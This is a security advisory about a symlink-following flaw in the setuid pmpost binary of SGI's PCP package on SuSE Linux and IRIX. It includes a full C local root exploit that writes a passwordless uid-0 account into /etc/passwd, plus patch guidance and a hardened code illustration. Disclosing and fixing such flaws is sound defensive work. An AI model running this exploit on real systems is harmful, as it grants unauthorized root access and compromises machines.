COMMAND

    pmpost

SYSTEMS AFFECTED

    PCP package (IRIX, SuSE Linux)

PROBLEM

    Paul Starzetz found the following.  There is a symlink handling
    problem in the pcp suite from SGI.  The binary pmpost follows
    symlinks; if it is setuid root, this leads to an instant root
    compromise, as found on SuSE 7.1.

    Attached is a simple C source to demonstrate this (gcc pm.c -o pm,
    then ./pm):

    /********************************************************
    *                                                       *
    *           pmpost local root exploit                   *
    *           vulnerable: pcp <= 2.1.11-5                 *
    *           by IhaQueR                                  *
    *                                                       *
    ********************************************************/

    #include <stdio.h>
    #include <stdlib.h>
    #include <time.h>
    #include <unistd.h>
    #include <sys/types.h>
    #include <sys/wait.h>
    #include <fcntl.h>
    #include <sys/stat.h>

    int main(void)
    {
        const char *bin = "/usr/share/pcp/bin/pmpost";
        static char buf[512];
        static char dir[128];

        /* private scratch directory that will be passed as PCP_LOG_DIR */
        srand(time(NULL));
        sprintf(dir, "/tmp/dupa.%.8d", rand());

        if (mkdir(dir, S_IRWXU))
            _exit(2);

        if (chdir(dir))
            _exit(3);

        /* pmpost appends to $PCP_LOG_DIR/NOTICES and follows the symlink */
        if (symlink("/etc/passwd", "./NOTICES"))
            _exit(4);

        snprintf(buf, sizeof(buf) - 1, "PCP_LOG_DIR=%.500s", dir);

        if (putenv(buf))
            _exit(5);

        if (!fork()) {
            execl(bin, bin, "\nr00t::0:0:root:/root:/bin/bash", NULL);
            _exit(1);
        } else {
            waitpid(0, NULL, WUNTRACED);
            chdir("..");
            sprintf(buf, "rm -rf dupa.*");
            system(buf);
            execl("/bin/su", "/bin/su", "r00t", NULL);
        }
        return 0;
    }

    The pmpost binary  is contained in  the package "pcp",  as shipped
    with the distributions SuSE-7.0, 7.1 and 7.2.  In the distribution
    7.0, /usr/share/pcp/bin/pmpost is not  installed setuid root.   In
    7.1 and 7.2,  pmpost _is_ setuid  root and therefore  exploitable.
    The  pcp  package  is  not  installed  by  default  in  any of the
    distributions.

    The source in src/libpcp/src/config.c reads

        if ((p = getenv(var)) != NULL)
            val = p;

    for configuration items from /etc/pcp.conf, and therefore trusts
    the user's environment.  The same applies to the environment
    variable PCP_CONF, which specifies the configuration file.  This
    way of treating user input is not acceptable for a privileged
    program.  The actual open(2) call in src/pmpost/pmpost.c (near
    "umask(022);  /* is this just paranoid? */") can't be fixed without
    completely ignoring the user-supplied environment, since open(2)
    can't guarantee that a path segment leading to the file is not a
    symlink.
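    As an added illustration (not code from the advisory or from PCP), a
    hardened form of the lookup quoted above next to an O_NOFOLLOW open of
    the NOTICES file; running_privileged, pcp_config_value and open_notices
    are hypothetical names, and the default log directory is constructed:

```c
#define _XOPEN_SOURCE 700
#include <errno.h>
#include <fcntl.h>
#include <limits.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

/* Hardened counterpart (hypothetical, not PCP's code) to the lookup quoted
 * from config.c: the environment override is honoured only when the
 * process is not running with privileges other than the invoking user's. */
int running_privileged(void)
{
    return getuid() != geteuid() || getgid() != getegid();
}

const char *pcp_config_value(const char *var, const char *dflt, int privileged)
{
    const char *p;

    if (!privileged && (p = getenv(var)) != NULL && *p != '\0')
        return p;          /* unprivileged: user may redirect, harms only themselves */
    return dflt;           /* privileged: compiled-in / /etc/pcp.conf value only */
}

/* Open <dir>/NOTICES for appending.  O_NOFOLLOW refuses a symlink in the
 * final component (ELOOP), but says nothing about the directories leading
 * to it, which is why `dir` must never come from the environment of a
 * setuid process: this call alone cannot close the hole. */
int open_notices(const char *dir)
{
    char path[PATH_MAX];

    if (snprintf(path, sizeof path, "%s/NOTICES", dir) >= (int)sizeof path) {
        errno = ENAMETOOLONG;
        return -1;
    }
    return open(path, O_WRONLY | O_APPEND | O_CREAT | O_NOFOLLOW, 0644);
}

int main(void)
{
    /* constructed default; the real value would come from /etc/pcp.conf */
    const char *logdir = pcp_config_value("PCP_LOG_DIR", "/var/log/pcp",
                                          running_privileged());
    printf("log dir in use: %s\n", logdir);
    return 0;
}
```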

    It's probably a very rare package under Linux, but more common
    under IRIX.

    With minor modifications, the above exploit yields root with the
    IRIX version of PCP 2.1 running under IRIX 6.5.10.  PCP 2.2 under
    IRIX 6.5.11+ was not tested.

    Comparing notes with Jan-Frode indicated that SGI has released
    more than one version of PCP 2.1.  Not all versions are vulnerable
    (PCP 2.1 under 6.5.6m was not).  One way to check whether you're
    vulnerable is to run:

        strings /usr/pcp/bin/pmpost | grep PCP_LOG_DIR

SOLUTION

    As a workaround for SuSE (suitable both as a temporary and as a
    permanent measure), remove the setuid bits from the two programs
    /usr/share/pcp/bin/pmpost and /usr/share/pcp/bin/pmkstat by using
    the following command (as root):

        chmod a-s /usr/share/pcp/bin/*

    A change  to /etc/permissions*  is not  necessary because  the two
    binaries are not  listed there.   Users of the  package might want
    to  change  ownerships  to  make  the  functionality of the pmpost
    program available again.  Alternatively, users may want to  delete
    the package if it is not used:  rpm --nodeps -e pcp.

    Performance Co-Pilot  (version 2.2.1-3)  is now  available.   This
    version contains  fixes for  the recent  security issues uncovered
    against the  earlier 2.2.0-18  release.   Please upgrade;  the new
    source and binary RPMs are available from

        http://oss.sgi.com/projects/pcp/download

    For  PCP  on  IRIX,  a  patch  will  be  available shortly for SGI
    customers.